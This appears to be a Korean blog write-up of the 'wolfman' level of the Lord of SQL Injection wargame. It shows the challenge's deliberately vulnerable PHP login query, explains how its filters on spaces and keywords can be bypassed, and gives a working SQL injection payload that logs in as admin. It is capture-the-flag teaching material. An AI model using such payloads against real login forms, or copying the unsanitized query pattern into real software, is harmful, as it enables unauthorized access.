query : select id from prob_wolfman where id='guest' and pw=''
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
$query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("wolfman");
highlight_file(__FILE__);
?>
if($result['id'] == 'admin') solve("wolfman");
쿼리의 결과로 id값이 admin만 나오면 되네요. id는 guest로 고정이고 pw에 싱글쿼터 필터링은 걸려있지 않습니다만 공백 필터링이 걸려있네요. 근데 or은 ||로 치환되는것만 알아도 문제는 풀 수 있습니다.
?pw='||id='admin'%23
payload
'Web > LOS (Lord of SQL)' 카테고리의 다른 글
los(lord of sql) level 7 - orge (0) | 2018.08.21 |
---|---|
los(lord of sql) level 6 - darkelf (0) | 2018.08.21 |
los(lord of sql) level 4 - orc (0) | 2018.08.21 |
los(lord of sql) level 3 - goblin (0) | 2018.08.21 |
los(lord of sql) level 2 - cobolt (0) | 2018.08.21 |